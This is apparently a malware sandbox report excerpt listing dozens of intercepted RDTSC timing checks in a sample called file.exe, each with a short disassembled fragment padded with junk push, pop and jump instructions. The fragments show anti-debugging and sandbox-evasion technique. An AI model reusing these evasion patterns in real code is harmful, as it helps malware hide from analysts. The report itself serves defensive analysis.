Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4393 second address: 4D43A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F3D90F37F16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D360D second address: 4D362A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b js 00007F3D90D93B46h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F3D90D93B46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D43A0 second address: 4D43E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, dx 0x0000000b push 00000000h 0x0000000d jno 00007F3D90F37F16h 0x00000013 push 00000000h 0x00000015 mov ebx, 3FD00209h 0x0000001a xchg eax, esi 0x0000001b jmp 00007F3D90F37F1Bh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F3D90F37F1Fh 0x00000029 jg 00007F3D90F37F16h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D362A second address: 4D362E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D370A second address: 4D370F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D4585 second address: 4D459E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F3D90D93B46h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F3D90D93B46h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D5492 second address: 4D5496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D467E second address: 4D46AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D90D93B50h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D644A second address: 4D6450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E00CD second address: 4E00D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E01F3 second address: 4E01F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E01F7 second address: 4E0203 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0203 second address: 4E021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F3D90F37F16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E021A second address: 4E021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0385 second address: 4E0398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E0398 second address: 4E039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04C3 second address: 4E04C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04C9 second address: 4E04CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04CF second address: 4E04D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3D90F37F2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E04D9 second address: 4E0508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B53h 0x00000009 jp 00007F3D90D93B4Ch 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007F3D90D93B5Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E5D84 second address: 4E5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E5D9E second address: 4E5DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EA719 second address: 4EA71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAE15 second address: 4EAE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EAE1B second address: 4EAE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F1Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB26D second address: 4EB284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB284 second address: 4EB28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB28F second address: 4EB293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7A8 second address: 4EB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3D90F37F16h 0x0000000a jng 00007F3D90F37F16h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7BD second address: 4EB7E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3D90D93B58h 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB7E1 second address: 4EB7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 470A4C second address: 470A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B57h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1725 second address: 4F1729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F1729 second address: 4F172F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBE2B second address: 4BBE31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFA9 second address: 4BBFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFAF second address: 4BBFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BBFB3 second address: 4BBFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0E5 second address: 4BC0EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA31 second address: 4BCA3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA3B second address: 4BCA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90F37F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCA45 second address: 4BCA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A192A second address: 4A192E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A192E second address: 4A193A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3D90D93B46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0AFC second address: 4F0B18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007F3D90F37F1Bh 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0B18 second address: 4F0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3D90D93B46h 0x0000000a jmp 00007F3D90D93B54h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CB6 second address: 4F0CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CBB second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B51h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CE0 second address: 4F0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F0CE6 second address: 4F0CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5D6E second address: 4F5D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F629C second address: 4F62C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F3D90D93B58h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F62C1 second address: 4F62C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6425 second address: 4F644D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3D90D93B54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jne 00007F3D90D93B46h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F644D second address: 4F646A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90F37F28h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F646A second address: 4F6487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B53h 0x00000007 ja 00007F3D90D93B4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5AA9 second address: 4F5AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3D90F37F16h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5AB4 second address: 4F5AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6715 second address: 4F672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F672F second address: 4F6737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6894 second address: 4F6898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6C60 second address: 4F6C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F3D90D93B46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F6C70 second address: 4F6C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F3D90F37F30h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501807 second address: 501813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501813 second address: 501817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501817 second address: 50181B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50181B second address: 501830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3D90F37F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F3D90F37F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500620 second address: 50062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3D90D93B46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50062A second address: 500645 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3D90F37F22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500645 second address: 50064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008D4 second address: 5008DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008DC second address: 5008E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5008E3 second address: 500901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F3D90F37F16h 0x00000009 jmp 00007F3D90F37F23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B55 second address: 500B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B5B second address: 500B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500B63 second address: 500BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F3D90D93B5Ah 0x0000000d js 00007F3D90D93B4Ch 0x00000013 js 00007F3D90D93B46h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F3D90D93B50h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500CBB second address: 500CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jns 00007F3D90F37F16h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500CE2 second address: 500CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E30 second address: 500E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E34 second address: 500E3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E3E second address: 500E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500E44 second address: 500E4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501156 second address: 501161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D90F37F16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501161 second address: 501170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90D93B4Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012BE second address: 5012C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012C3 second address: 5012CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3D90D93B46h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5012CF second address: 5012D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E1F second address: 509E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E31 second address: 509E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E37 second address: 509E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E3B second address: 509E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E3F second address: 509E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509E47 second address: 509E54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3D90F37F16h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509725 second address: 50972A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50986B second address: 50986F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50986F second address: 509875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509875 second address: 509899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3D90F37F27h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509899 second address: 5098A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3D90D93B46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099E5 second address: 5099EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099EB second address: 5099EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5099EF second address: 509A08 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c pushad 0x0000000d jnp 00007F3D90F37F16h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509B81 second address: 509BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B59h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E117 second address: 50E11C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
